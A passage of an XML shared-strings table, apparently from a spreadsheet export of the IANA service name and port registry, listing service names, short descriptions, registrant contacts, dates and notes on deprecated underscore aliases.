    <t>eis</t>
  </si>
  <si>
    <t>ESRI Image Server</t>
  </si>
  <si>
    <t>eisp</t>
  </si>
  <si>
    <t>ESRI Image Service</t>
  </si>
  <si>
    <t>[Keith_Ryden]</t>
  </si>
  <si>
    <t>2006-07</t>
  </si>
  <si>
    <t>mapper-nodemgr</t>
  </si>
  <si>
    <t>MAPPER network node manager</t>
  </si>
  <si>
    <t>mapper-mapethd</t>
  </si>
  <si>
    <t>MAPPER TCP/IP server</t>
  </si>
  <si>
    <t>mapper-ws-ethd</t>
  </si>
  <si>
    <t>MAPPER workstation server
IANA assigned this well-formed service name as a replacement for "mapper-ws_ethd".</t>
  </si>
  <si>
    <t>[John_C_Horton]</t>
  </si>
  <si>
    <t>mapper-ws_ethd</t>
  </si>
  <si>
    <t>MAPPER workstation server</t>
  </si>
  <si>
    <t>This entry is an alias to "mapper-ws-ethd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>centerline</t>
  </si>
  <si>
    <t>Centerline</t>
  </si>
  <si>
    <t>[Mark_Simpson]</t>
  </si>
  <si>
    <t>dcs-config</t>
  </si>
  <si>
    <t>DCS Configuration Port</t>
  </si>
  <si>
    <t>[Ian_Cargill]</t>
  </si>
  <si>
    <t>bv-queryengine</t>
  </si>
  <si>
    <t>BindView-Query Engine</t>
  </si>
  <si>
    <t>bv-is</t>
  </si>
  <si>
    <t>BindView-IS</t>
  </si>
  <si>
    <t>bv-smcsrv</t>
  </si>
  <si>
    <t>BindView-SMCServer</t>
  </si>
  <si>
    <t>bv-ds</t>
  </si>
  <si>
    <t>BindView-DirectoryServer</t>
  </si>
  <si>
    <t>bv-agent</t>
  </si>
  <si>
    <t>BindView-Agent</t>
  </si>
  <si>
    <t>[David_A_Gayler]</t>
  </si>
  <si>
    <t>iss-mgmt-ssl</t>
  </si>
  <si>
    <t>ISS Management Svcs SSL</t>
  </si>
  <si>
    <t>abcsoftware</t>
  </si>
  <si>
    <t>abcsoftware-01</t>
  </si>
  <si>
    <t>[Andrew_Zimmerman]</t>
  </si>
  <si>
    <t>agentsease-db</t>
  </si>
  <si>
    <t>aes_db</t>
  </si>
  <si>
    <t>[Colin_Hughes]</t>
  </si>
  <si>
    <t>dnx</t>
  </si>
  <si>
    <t>Distributed Nagios Executor Service</t>
  </si>
  <si>
    <t>[John_Calcote]</t>
  </si>
  <si>
    <t>nvcnet</t>
  </si>
  <si>
    <t>Norman distributes scanning service</t>
  </si>
  <si>
    <t>[Kristian_A_Bognaes]</t>
  </si>
  <si>
    <t>terabase</t>
  </si>
  <si>
    <t>Terabase</t>
  </si>
  <si>
    <t>[Thor_Olson]</t>
  </si>
  <si>
    <t>Potential Conflict of ports
PORT 4000 also used by ICQ &lt;www.icq.com&gt;</t>
  </si>
  <si>
    <t>newoak</t>
  </si>
  <si>
    <t>NewOak</t>
  </si>
  <si>
    <t>[Jim_Philippou]</t>
  </si>
  <si>
    <t>pxc-spvr-ft</t>
  </si>
  <si>
    <t>pxc-splr-ft</t>
  </si>
  <si>
    <t>pxc-roid</t>
  </si>
  <si>
    <t>pxc-pin</t>
  </si>
  <si>
    <t>pxc-spvr</t>
  </si>
  <si>
    <t>pxc-splr</t>
  </si>
  <si>
    <t>[Dave_Nesbitt]</t>
  </si>
  <si>
    <t>netcheque</t>
  </si>
  <si>
    <t>NetCheque accounting</t>
  </si>
  <si>
    <t>chimera-hwm</t>
  </si>
  <si>
    <t>Chimera HWM</t>
  </si>
  <si>
    <t>[Ken_Anderson]</t>
  </si>
  <si>
    <t>samsung-unidex</t>
  </si>
  <si>
    <t>Samsung Unidex</t>
  </si>
  <si>
    <t>[Konstantin_V_Vyazni]</t>
  </si>
  <si>
    <t>altserviceboot</t>
  </si>
  <si>
    <t>Alternate Service Boot</t>
  </si>
  <si>
    <t>[Eric_Dittert]</t>
  </si>
  <si>
    <t>pda-gate</t>
  </si>
  <si>
    <t>PDA Gate</t>
  </si>
  <si>
    <t>acl-manager</t>
  </si>
  <si>
    <t>ACL Manager</t>
  </si>
  <si>
    <t>taiclock</t>
  </si>
  <si>
    <t>TAICLOCK</t>
  </si>
  <si>
    <t>talarian-mcast1</t>
  </si>
  <si>
    <t>Talarian Mcast</t>
  </si>
  <si>
    <t>talarian-mcast2</t>
  </si>
  <si>
    <t>talarian-mcast3</t>
  </si>
  <si>
    <t>talarian-mcast4</t>
  </si>
  <si>
    <t>talarian-mcast5</t>
  </si>
  <si>
    <t>[Geoff_Mendal]</t>
  </si>
  <si>
    <t>trap</t>
  </si>
  <si>
    <t>TRAP Port</t>
  </si>
  <si>
    <t>[Jeffrey_C_Byrd]</t>
  </si>
  <si>
    <t>nexus-portal</t>
  </si>
  <si>
    <t>Nexus Portal</t>
  </si>
  <si>
    <t>[Damian_Tarnawsky]</t>
  </si>
  <si>
    <t>dnox</t>
  </si>
  <si>
    <t>DNOX</t>
  </si>
  <si>
    <t>[Leo_Rathnayake]</t>
  </si>
  <si>
    <t>esnm-zoning</t>
  </si>
  <si>
    <t>ESNM Zoning Port</t>
  </si>
  <si>
    <t>[Yong_Cai]</t>
  </si>
  <si>
    <t>tnp1-port</t>
  </si>
  <si>
    <t>TNP1 User Port</t>
  </si>
  <si>
    <t>[Tony_Gibbs]</t>
  </si>
  <si>
    <t>partimage</t>
  </si>
  <si>
    <t>Partition Image Port</t>
  </si>
  <si>
    <t>[Franck_Ladurelle]</t>
  </si>
  <si>
    <t>as-debug</t>
  </si>
  <si>
    <t>Graphical Debug Server</t>
  </si>
  <si>
    <t>[Steve_Halverson]</t>
  </si>
  <si>
    <t>bxp</t>
  </si>
  <si>
    <t>bitxpress</t>
  </si>
  <si>
    <t>[Morgan_Doyle]</t>
  </si>
  <si>
    <t>dtserver-port</t>
  </si>
  <si>
    <t>DTServer Port</t>
  </si>
  <si>
    <t>[Stephen_Aikins]</t>
  </si>
  <si>
    <t>ip-qsig</t>
  </si>
  <si>
    <t>IP Q signaling protocol</t>
  </si>
  <si>
    <t>[Toru_Tachibana]</t>
  </si>
  <si>
    <t>jdmn-port</t>
  </si>
  <si>
    <t>Accell/JSP Daemon Port</t>
  </si>
  <si>
    <t>suucp</t>
  </si>
  <si>
    <t>UUCP over SSL</t>
  </si>
  <si>
    <t>[Harald_Welte]</t>
  </si>
  <si>
    <t>vrts-auth-port</t>
  </si>
  <si>
    <t>VERITAS Authorization Service</t>
  </si>
  <si>
    <t>sanavigator</t>
  </si>
  <si>
    <t>SANavigator Peer Port</t>
  </si>
  <si>
    <t>[Robert_J_Chansler]</t>
  </si>
  <si>
    <t>ubxd</t>
  </si>
  <si>
    <t>Ubiquinox Daemon</t>
  </si>
  <si>
    <t>[Kit_Smithers]</t>
  </si>
  <si>
    <t>wap-push-http</t>
  </si>
  <si>
    <t>WAP Push OTA-HTTP port</t>
  </si>
  <si>
    <t>wap-push-https</t>
  </si>
  <si>
    <t>WAP Push OTA-HTTP secure</t>
  </si>
  <si>
    <t>[Matthieu_Lachance]</t>
  </si>
  <si>
    <t>ravehd</t>
  </si>
  <si>
    <t>RaveHD network control</t>
  </si>
  <si>
    <t>[Jason_Howard]</t>
  </si>
  <si>
    <t>fazzt-ptp</t>
  </si>
  <si>
    <t>Fazzt Point-To-Point</t>
  </si>
  <si>
    <t>fazzt-admin</t>
  </si>
  <si>
    <t>Fazzt Administration</t>
  </si>
  <si>
    <t>[Lewis_Wolfgang]</t>
  </si>
  <si>
    <t>yo-main</t>
  </si>
  <si>
    <t>Yo.net main service</t>
  </si>
  <si>
    <t>[John_Tintor]</t>
  </si>
  <si>
    <t>houston</t>
  </si>
  <si>
    <t>Rocketeer-Houston</t>
  </si>
  <si>
    <t>[Johnny_C_Norris_II]</t>
  </si>
  <si>
    <t>ldxp</t>
  </si>
  <si>
    <t>LDXP</t>
  </si>
  <si>
    <t>[Craig_Calef]</t>
  </si>
  <si>
    <t>nirp</t>
  </si>
  <si>
    <t>Neighbour Identity Resolution</t>
  </si>
  <si>
    <t>ltp</t>
  </si>
  <si>
    <t>Location Tracking Protocol</t>
  </si>
  <si>
    <t>Network Paging Protocol</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USE: Port 4045</t>
  </si>
  <si>
    <t>acp-proto</t>
  </si>
  <si>
    <t>Accounting Protocol</t>
  </si>
  <si>
    <t>ctp-state</t>
  </si>
  <si>
    <t>Context Transfer Protocol</t>
  </si>
  <si>
    <t>[Hesham_Soliman]</t>
  </si>
  <si>
    <t>wafs</t>
  </si>
  <si>
    <t>Wide Area File Services</t>
  </si>
  <si>
    <t>[Yuval_Hager]</t>
  </si>
  <si>
    <t>cisco-wafs</t>
  </si>
  <si>
    <t>[Etai_Lev_Ran]</t>
  </si>
  <si>
    <t>cppdp</t>
  </si>
  <si>
    <t>Cisco Peer to Peer Distribution Protocol</t>
  </si>
  <si>
    <t>[Susan_Sauter]</t>
  </si>
  <si>
    <t>interact</t>
  </si>
  <si>
    <t>VoiceConnect Interact</t>
  </si>
  <si>
    <t>[Jonathan_Custance]</t>
  </si>
  <si>
    <t>ccu-comm-1</t>
  </si>
  <si>
    <t>CosmoCall Universe Communications Port 1</t>
  </si>
  <si>
    <t>ccu-comm-2</t>
  </si>
  <si>
    <t>CosmoCall Universe Communications Port 2</t>
  </si>
  <si>
    <t>ccu-comm-3</t>
  </si>
  <si>
    <t>CosmoCall Universe Communications Port 3</t>
  </si>
  <si>
    <t>[Steve_Dellutri_2]</t>
  </si>
  <si>
    <t>lms</t>
  </si>
  <si>
    <t>Location Message Service</t>
  </si>
  <si>
    <t>[Sergey_Burnevsky]</t>
  </si>
  <si>
    <t>wfm</t>
  </si>
  <si>
    <t>Servigistics WFM server</t>
  </si>
  <si>
    <t>[Yuri_Machkasov_2]</t>
  </si>
  <si>
    <t>kingfisher</t>
  </si>
  <si>
    <t>Kingfisher protocol</t>
  </si>
  <si>
    <t>[Vaughan_Wesson]</t>
  </si>
  <si>
    <t>dlms-cosem</t>
  </si>
  <si>
    <t>DLMS/COSEM</t>
  </si>
  <si>
    <t>[Gyozo_Kmethy]</t>
  </si>
  <si>
    <t>dsmeter-iatc</t>
  </si>
  <si>
    <t>DSMETER Inter-Agent Transfer Channel
IANA assigned this well-formed service name as a replacement for "dsmeter_iatc".</t>
  </si>
  <si>
    <t>[John_McCann]</t>
  </si>
  <si>
    <t>2006-12</t>
  </si>
  <si>
    <t>dsmeter_iatc</t>
  </si>
  <si>
    <t>DSMETER Inter-Agent Transfer Channel</t>
  </si>
  <si>
    <t>This entry is an alias to "dsmeter-iatc".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>ice-location</t>
  </si>
  <si>
    <t>Ice Location Service (TCP)</t>
  </si>
  <si>
    <t>ice-slocation</t>
  </si>
  <si>
    <t>Ice Location Service (SSL)</t>
  </si>
  <si>
    <t>ice-router</t>
  </si>
  <si>
    <t>Ice Firewall Traversal Service (TCP)</t>
  </si>
  <si>
    <t>ice-srouter</t>
  </si>
  <si>
    <t>Ice Firewall Traversal Service (SSL)</t>
  </si>
  <si>
    <t>[Bernard_Normier]</t>
  </si>
  <si>
    <t>avanti-cdp</t>
  </si>
  <si>
    <t>Avanti Common Data
IANA assigned this well-formed service name as a replacement for "avanti_cdp".</t>
  </si>
  <si>
    <t>2007-02</t>
  </si>
  <si>
    <t>avanti_cdp</t>
  </si>
  <si>
    <t>Avanti Common Data</t>
  </si>
  <si>
    <t>This entry is an alias to "avanti-cdp".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>pmas</t>
  </si>
  <si>
    <t>Performance Measurement and Analysis</t>
  </si>
  <si>
    <t>[Zenon_Fortuna]</t>
  </si>
  <si>
    <t>idp</t>
  </si>
  <si>
    <t>Information Distribution Protocol</t>
  </si>
  <si>
    <t>[Michaela_Vanderveen]</t>
  </si>
  <si>
    <t>ipfltbcst</t>
  </si>
  <si>
    <t>IP Fleet Broadcast</t>
  </si>
  <si>
    <t>[Trung_Huu_Tran]</t>
  </si>
  <si>
    <t>minger</t>
  </si>
  <si>
    <t>Minger Email Address Validation Service</t>
  </si>
  <si>
    <t>[Arvel_Hathcock]</t>
  </si>
  <si>
    <t>tripe</t>
  </si>
  <si>
    <t>Trivial IP Encryption (TrIPE)</t>
  </si>
  <si>
    <t>[Mark_Wooding]</t>
  </si>
  <si>
    <t>aibkup</t>
  </si>
  <si>
    <t>Automatically Incremental Backup</t>
  </si>
  <si>
    <t>[Volker_Wiegand]</t>
  </si>
  <si>
    <t>zieto-sock</t>
  </si>
  <si>
    <t>Zieto Socket Communications</t>
  </si>
  <si>
    <t>[Malcolm_McLean]</t>
  </si>
  <si>
    <t>iRAPP</t>
  </si>
  <si>
    <t>Interactive Remote Application Pairing Protocol</t>
  </si>
  <si>
    <t>[Volodymyr_Bykov]</t>
  </si>
  <si>
    <t>cequint-cityid</t>
  </si>
  <si>
    <t>Cequint City ID UI trigger</t>
  </si>
  <si>
    <t>[Phill_Goeckler]</t>
  </si>
  <si>
    <t>perimlan</t>
  </si>
  <si>
    <t>ISC Alarm Message Service</t>
  </si>
  <si>
    <t>[Bernie_Malkowski]</t>
  </si>
  <si>
    <t>seraph</t>
  </si>
  <si>
    <t>Seraph DCS</t>
  </si>
  <si>
    <t>[Jason_Spence]</t>
  </si>
  <si>
    <t>ascomalarm</t>
  </si>
  <si>
    <t>Ascom IP Alarming</t>
  </si>
  <si>
    <t>[Ascom_Austria_GmbH]</t>
  </si>
  <si>
    <t>cssp</t>
  </si>
  <si>
    <t>Coordinated Security Service Protocol</t>
  </si>
  <si>
    <t>[Michael_McDaniels]</t>
  </si>
  <si>
    <t>santools</t>
  </si>
  <si>
    <t>SANtools Diagnostic Server</t>
  </si>
  <si>
    <t>[David_A_Lethe_2]</t>
  </si>
  <si>
    <t>lorica-in</t>
  </si>
  <si>
    <t>Lorica inside facing</t>
  </si>
  <si>
    <t>lorica-in-sec</t>
  </si>
  <si>
    <t>Lorica inside facing (SSL)</t>
  </si>
  <si>
    <t>lorica-out</t>
  </si>
  <si>
    <t>Lorica outside facing</t>
  </si>
  <si>
    <t>lorica-out-sec</t>
  </si>
  <si>
    <t>Lorica outside facing (SSL)</t>
  </si>
  <si>
    <t>fortisphere-vm</t>
  </si>
  <si>
    <t>Fortisphere VM Service</t>
  </si>
  <si>
    <t>[Daniel_Becker_4]</t>
  </si>
  <si>
    <t>ezmessagesrv</t>
  </si>
  <si>
    <t>EZNews Newsroom Message Service</t>
  </si>
  <si>
    <t>[Gerald_R_Jensen]</t>
  </si>
  <si>
    <t>ftsync</t>
  </si>
  <si>
    <t>Firewall/NAT state table synchronization</t>
  </si>
  <si>
    <t>[Heiner_Erne]</t>
  </si>
  <si>
    <t>applusservice</t>
  </si>
  <si>
    <t>APplus Service</t>
  </si>
  <si>
    <t>npsp</t>
  </si>
  <si>
    <t>Noah Printing Service Protocol</t>
  </si>
  <si>
    <t>[Hiromi_Ohara]</t>
  </si>
  <si>
    <t>opencore</t>
  </si>
  <si>
    <t>OpenCORE Remote Control Service</t>
  </si>
  <si>
    <t>[Pim_van_Riezen]</t>
  </si>
  <si>
    <t>omasgport</t>
  </si>
  <si>
    <t>OMA BCAST Service Guide</t>
  </si>
  <si>
    <t>[Mark_Lipford]</t>
  </si>
  <si>
    <t>ewinstaller</t>
  </si>
  <si>
    <t>EminentWare Installer</t>
  </si>
  <si>
    <t>ewdgs</t>
  </si>
  <si>
    <t>EminentWare DGS</t>
  </si>
  <si>
    <t>[David_A_Gayler_2]</t>
  </si>
  <si>
    <t>pvxpluscs</t>
  </si>
  <si>
    <t>Pvx Plus CS Host</t>
  </si>
  <si>
    <t>[Michael_King]</t>
  </si>
  <si>
    <t>sysrqd</t>
  </si>
  <si>
    <t>sysrq daemon</t>
  </si>
  <si>
    <t>[Julien_Danjou]</t>
  </si>
  <si>
    <t>xtgui</t>
  </si>
  <si>
    <t>xtgui information service</t>
  </si>
  <si>
    <t>[Jim_Robanske]</t>
  </si>
  <si>
    <t>bre</t>
  </si>
  <si>
    <t>BRE (Bridge Relay Element)</t>
  </si>
  <si>
    <t>[Stephen_Egbert]</t>
  </si>
  <si>
    <t>patrolview</t>
  </si>
  <si>
    <t>Patrol View</t>
  </si>
  <si>
    <t>drmsfsd</t>
  </si>
  <si>
    <t>[Masao_Iwai]</t>
  </si>
  <si>
    <t>dpcp</t>
  </si>
  <si>
    <t>DPCP</t>
  </si>
  <si>
    <t>[John_Croft]</t>
  </si>
  <si>
    <t>igo-incognito</t>
  </si>
  <si>
    <t>IGo Incognito Data Port</t>
  </si>
  <si>
    <t>[Paul_Reddy_2]</t>
  </si>
  <si>
    <t>brlp-0</t>
  </si>
  <si>
    <t>Braille protocol</t>
  </si>
  <si>
    <t>brlp-1</t>
  </si>
  <si>
    <t>brlp-2</t>
  </si>
  <si>
    <t>brlp-3</t>
  </si>
  <si>
    <t>[Sebastien_Hinderer]</t>
  </si>
  <si>
    <t>shofar</t>
  </si>
  <si>
    <t>Shofar</t>
  </si>
  <si>
    <t>[ShofarNexus]</t>
  </si>
  <si>
    <t>[John_Kozlowski]</t>
  </si>
  <si>
    <t>synchronite</t>
  </si>
  <si>
    <t>Synchronite</t>
  </si>
  <si>
    <t>[James_Figgins]</t>
  </si>
  <si>
    <t>j-ac</t>
  </si>
  <si>
    <t>JDL Accounting LAN Service</t>
  </si>
  <si>
    <t>[Takashi_Sahara]</t>
  </si>
  <si>
    <t>accel</t>
  </si>
  <si>
    <t>ACCEL</t>
  </si>
  <si>
    <t>[Masahiro_Koiwai]</t>
  </si>
  <si>
    <t>izm</t>
  </si>
  <si>
    <t>Instantiated Zero-control Messaging</t>
  </si>
  <si>
    <t>[David_Miller]</t>
  </si>
  <si>
    <t>g2tag</t>
  </si>
  <si>
    <t>G2 RFID Tag Telemetry Data</t>
  </si>
  <si>
    <t>[David_Goodall]</t>
  </si>
  <si>
    <t>xgrid</t>
  </si>
  <si>
    <t>Xgrid</t>
  </si>
  <si>
    <t>[David_Kramer]</t>
  </si>
  <si>
    <t>apple-vpns-rp</t>
  </si>
  <si>
    <t>Apple VPN Server Reporting Protocol</t>
  </si>
  <si>
    <t>[Christophe_Allie]</t>
  </si>
  <si>
    <t>aipn-reg</t>
  </si>
  <si>
    <t>AIPN LS Registration</t>
  </si>
  <si>
    <t>[Qiang_Zhang_2]</t>
  </si>
  <si>
    <t>jomamqmonitor</t>
  </si>
  <si>
    <t>JomaMQMonitor</t>
  </si>
  <si>
    <t>[Marcel_Hofstetter]</t>
  </si>
  <si>
    <t>cds</t>
  </si>
  <si>
    <t>CDS Transfer Agent</t>
  </si>
  <si>
    <t>[Neil_Coggins]</t>
  </si>
  <si>
    <t>smartcard-tls</t>
  </si>
  <si>
    <t>smartcard-TLS</t>
  </si>
  <si>
    <t>[Ilan_Mahalal]</t>
  </si>
  <si>
    <t>hillrserv</t>
  </si>
  <si>
    <t>Hillr Connection Manager</t>
  </si>
  <si>
    <t>[Freddy_A_Ayuso_Hens]</t>
  </si>
  <si>
    <t>netscript</t>
  </si>
  <si>
    <t>Netadmin Systems NETscript service</t>
  </si>
  <si>
    <t>[Goran_Runfeldt]</t>
  </si>
  <si>
    <t>assuria-slm</t>
  </si>
  <si>
    <t>Assuria Log Manager</t>
  </si>
  <si>
    <t>[Nick_Connor]</t>
  </si>
  <si>
    <t>minirem</t>
  </si>
  <si>
    <t>MiniRem Remote Telemetry and Control</t>
  </si>
  <si>
    <t>[MobilePro_Systems]</t>
  </si>
  <si>
    <t>[Sean_Solberg]</t>
  </si>
  <si>
    <t>e-builder</t>
  </si>
  <si>
    <t>e-Builder Application Communication</t>
  </si>
  <si>
    <t>[James_Caza]</t>
  </si>
  <si>
    <t>fprams</t>
  </si>
  <si>
    <t>Fiber Patrol Alarm Service</t>
  </si>
  <si>
    <t>[Zhizhong_Zhuang]</t>
  </si>
  <si>
    <t>z-wave</t>
  </si>
  <si>
    <t>Z-Wave Protocol</t>
  </si>
  <si>
    <t>[Sigma_Designs_Inc_2]</t>
  </si>
  <si>
    <t>[Anders_Brandt][Mary_Miller]</t>
  </si>
  <si>
    <t>tigv2</t>
  </si>
  <si>
    <t>Rohill TetraNode Ip Gateway v2</t>
  </si>
  <si>
    <t>[Bert_Bouwers]</t>
  </si>
  <si>
    <t>opsview-envoy</t>
  </si>
  <si>
    <t>Opsview Envoy</t>
  </si>
  <si>
    <t>[Ton_Voon]</t>
  </si>
  <si>
    <t>ddrepl</t>
  </si>
  <si>
    <t>Data Domain Replication Service</t>
  </si>
  <si>
    <t>[Pratik_Wadher]</t>
  </si>
  <si>
    <t>unikeypro</t>
  </si>
  <si>
    <t>NetUniKeyServer</t>
  </si>
  <si>
    <t>[Raymond_Chaw]</t>
  </si>
  <si>
    <t>nufw</t>
  </si>
  <si>
    <t>NuFW decision delegation protocol</t>
  </si>
  <si>
    <t>nuauth</t>
  </si>
  <si>
    <t>NuFW authentication protocol</t>
  </si>
  <si>
    <t>[Eric_Leblond]</t>
  </si>
  <si>
    <t>fronet</t>
  </si>
  <si>
    <t>FRONET message protocol</t>
  </si>
  <si>
    <t>[Christer_Nygren]</t>
  </si>
  <si>
    <t>stars</t>
  </si>
  <si>
    <t>[Harry_Goldschmitt_2]</t>
  </si>
  <si>
    <t>nuts-dem</t>
  </si>
  <si>
    <t>NUTS Daemon
IANA assigned this well-formed service name as a replacement for "nuts_dem".</t>
  </si>
  <si>
    <t>nuts_dem</t>
  </si>
  <si>
    <t>NUTS Daemon</t>
  </si>
  <si>
    <t>This entry is an alias to "nuts-dem".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>nuts-bootp</t>
  </si>
  <si>
    <t>NUTS Bootp Server
IANA assigned this well-formed service name as a replacement for "nuts_bootp".</t>
  </si>
  <si>
    <t>[Martin_Freiss_2]</t>
  </si>
  <si>
    <t>nuts_bootp</t>
  </si>
  <si>
    <t>NUTS Bootp Server</t>
  </si>
  <si>
    <t>This entry is an alias to "nuts-bootp".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>nifty-hmi</t>
  </si>
  <si>
    <t>NIFTY-Serve HMI protocol</t>
  </si>
  <si>
    <t>[Ryuichi_Suzuki]</t>
  </si>
  <si>
    <t>cl-db-attach</t>
  </si>
  <si>
    <t>Classic Line Database Server Attach</t>
  </si>
  <si>
    <t>cl-db-request</t>
  </si>
  <si>
    <t>Classic Line Database Server Request</t>
  </si>
  <si>
    <t>cl-db-remote</t>
  </si>
  <si>
    <t>Classic Line Database Server Remote</t>
  </si>
  <si>
    <t>[Arno_Kirmeir]</t>
  </si>
  <si>
    <t>nettest</t>
  </si>
  <si>
    <t>[David_Borman]</t>
  </si>
  <si>
    <t>thrtx</t>
  </si>
  <si>
    <t>Imperfect Networks Server</t>
  </si>
  <si>
    <t>[Dinkar_Chivaluri_2]</t>
  </si>
  <si>
    <t>cedros-fds</t>
  </si>
  <si>
    <t>Cedros Fraud Detection System
IANA assigned this well-formed service name as a replacement for "cedros_fds".</t>
  </si>
  <si>
    <t>[Markus_Michels_3]</t>
  </si>
  <si>
    <t>cedros_fds</t>
  </si>
  <si>
    <t>Cedros Fraud Detection System</t>
  </si>
  <si>
    <t>This entry is an alias to "cedros-fds".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>oirtgsvc</t>
  </si>
  <si>
    <t>Workflow Server</t>
  </si>
  <si>
    <t>oidocsvc</t>
  </si>
  <si>
    <t>Document Server</t>
  </si>
  <si>
    <t>oidsr</t>
  </si>
  <si>
    <t>Document Replication</t>
  </si>
  <si>
    <t>[Norman_Brie]</t>
  </si>
  <si>
    <t>Compuserve (unoffically) is using port 4144</t>
  </si>
  <si>
    <t>vvr-control</t>
  </si>
  <si>
    <t>VVR Control</t>
  </si>
  <si>
    <t>[Ming_Xu]</t>
  </si>
  <si>
    <t>tgcconnect</t>
  </si>
  <si>
    <t>TGCConnect Beacon</t>
  </si>
  <si>
    <t>[Brian_Becker]</t>
  </si>
  <si>
    <t>vrxpservman</t>
  </si>
  <si>
    <t>Multum Service Manager</t>
  </si>
  <si>
    <t>[Scott_Mager]</t>
  </si>
  <si>
    <t>hhb-handheld</t>
  </si>
  <si>
    <t>HHB Handheld Client</t>
  </si>
  <si>
    <t>[Steven_G_Loughner]</t>
  </si>
  <si>
    <t>agslb</t>
  </si>
  <si>
    <t>A10 GSLB Service</t>
  </si>
  <si>
    <t>[John_Chiong]</t>
  </si>
  <si>
    <t>PowerAlert-nsa</t>
  </si>
  <si>
    <t>PowerAlert Network Shutdown Agent</t>
  </si>
  <si>
    <t>[Mike_Delgrosso_2]</t>
  </si>
  <si>
    <t>menandmice-noh</t>
  </si>
  <si>
    <t>Men &amp; Mice Remote Control
IANA assigned this well-formed service name as a replacement for "menandmice_noh".</t>
  </si>
  <si>
    <t>[Eggert_Thorlacius]</t>
  </si>
  <si>
    <t>menandmice_noh</t>
  </si>
  <si>
    <t>Men &amp; Mice Remote Control</t>
  </si>
  <si>
    <t>This entry is an alias to "menandmice-noh".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>idig-mux</t>
  </si>
  <si>
    <t>iDigTech Multiplex
IANA assigned this well-formed service name as a replacement for "idig_mux".</t>
  </si>
  <si>
    <t>[Robin_Findley]</t>
  </si>
  <si>
    <t>idig_mux</t>
  </si>
  <si>
    <t>iDigTech Multiplex</t>
  </si>
  <si>
    <t>This entry is an alias to "idig-mux".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>mbl-battd</t>
  </si>
  <si>
    <t>MBL Remote Battery Monitoring</t>
  </si>
  <si>
    <t>[Claudio_Procida]</t>
  </si>
  <si>
    <t>atlinks</t>
  </si>
  <si>
    <t>atlinks device discovery</t>
  </si>
  <si>
    <t>[Scott_Griepentrog]</t>
  </si>
  <si>
    <t>bzr</t>
  </si>
  <si>
    <t>Bazaar version control system</t>
  </si>
  <si>
    <t>[Martin_Pool_2]</t>
  </si>
  <si>
    <t>stat-results</t>
  </si>
  <si>
    <t>STAT Results</t>
  </si>
  <si>
    <t>stat-scanner</t>
  </si>
  <si>
    <t>STAT Scanner Control</t>
  </si>
  <si>
    <t>stat-cc</t>
  </si>
  <si>
    <t>STAT Command Center</t>
  </si>
  <si>
    <t>[Darwin_Ammala]</t>
  </si>
  <si>
    <t>nss</t>
  </si>
  <si>
    <t>Network Security Service</t>
  </si>
  <si>
    <t>[Dave_Wierbowski]</t>
  </si>
  <si>
    <t>jini-discovery</t>
  </si>
  <si>
    <t>Jini Discovery</t>
  </si>
  <si>
    <t>omscontact</t>
  </si>
  <si>
    <t>OMS Contact</t>
  </si>
  <si>
    <t>omstopology</t>
  </si>
  <si>
    <t>OMS Topology</t>
  </si>
  <si>
    <t>[David_Page]</t>
  </si>
  <si>
    <t>silverpeakpeer</t>
  </si>
  <si>
    <t>Silver Peak Peer Protocol</t>
  </si>
  <si>
    <t>[Damon_Ennis]</t>
  </si>
  <si>
    <t>silverpeakcomm</t>
  </si>
  <si>
    <t>Silver Peak Communication Protocol</t>
  </si>
  <si>
    <t>altcp</t>
  </si>
  <si>
    <t>ArcLink over Ethernet</t>
  </si>
  <si>
    <t>[Dmitry_Brant]</t>
  </si>
  <si>
    <t>joost</t>
  </si>
  <si>
    <t>Joost Peer to Peer Protocol</t>
  </si>
  <si>
    <t>[Colm_MacCarthaigh]</t>
  </si>
  <si>
    <t>2007-04</t>
  </si>
  <si>
    <t>ddgn</t>
  </si>
  <si>
    <t>DeskDirect Global Network</t>
  </si>
  <si>
    <t>[Laurie_Charlwood]</t>
  </si>
  <si>
    <t>pslicser</t>
  </si>
  <si>
    <t>PrintSoft License Server</t>
  </si>
  <si>
    <t>[David_Weisgerber]</t>
  </si>
  <si>
    <t>iadt</t>
  </si>
  <si>
    <t>Automation Drive Interface Transport</t>
  </si>
  <si>
    <t>[Paul_Suhler]</t>
  </si>
  <si>
    <t>iadt-disc</t>
  </si>
  <si>
    <t>Internet ADT Discovery Protocol</t>
  </si>
  <si>
    <t>[Paul_A_Suhler]</t>
  </si>
  <si>
    <t>d-cinema-csp</t>
  </si>
  <si>
    <t>SMPTE Content Synchonization Protocol</t>
  </si>
  <si>
    <t>[Michael_Karagosian]</t>
  </si>
  <si>
    <t>ml-svnet</t>
  </si>
  <si>
    <t>Maxlogic Supervisor Communication</t>
  </si>
  <si>
    <t>[Taha_Paksu]</t>
  </si>
  <si>
    <t>pcoip</t>
  </si>
  <si>
    <t>PC over IP</t>
  </si>
  <si>
    <t>[Teradici]</t>
  </si>
  <si>
    <t>[Jeff_Dillabough]</t>
  </si>
  <si>
    <t>mma-discovery</t>
  </si>
  <si>
    <t>MMA Device Discovery</t>
  </si>
  <si>
    <t>[MIDI_Manufacturers_Assoc_Inc]</t>
  </si>
  <si>
    <t>[Tom_White]</t>
  </si>
  <si>
    <t>smcluster</t>
  </si>
  <si>
    <t>StorMagic Cluster Services</t>
  </si>
  <si>
    <t>[Chris_Farey]</t>
  </si>
  <si>
    <t>sm-disc</t>
  </si>
  <si>
    <t>StorMagic Discovery</t>
  </si>
  <si>
    <t>[StorMagic_Ltd]</t>
  </si>
  <si>
    <t>bccp</t>
  </si>
  <si>
    <t>Brocade Cluster Communication Protocol</t>
  </si>
  <si>
    <t>[Norival_Figueira]</t>
  </si>
  <si>
    <t>tl-ipcproxy</t>
  </si>
  <si>
    <t>Translattice Cluster IPC Proxy</t>
  </si>
  <si>
    <t>[Michael_Lyle]</t>
  </si>
  <si>
    <t>wello</t>
  </si>
  <si>
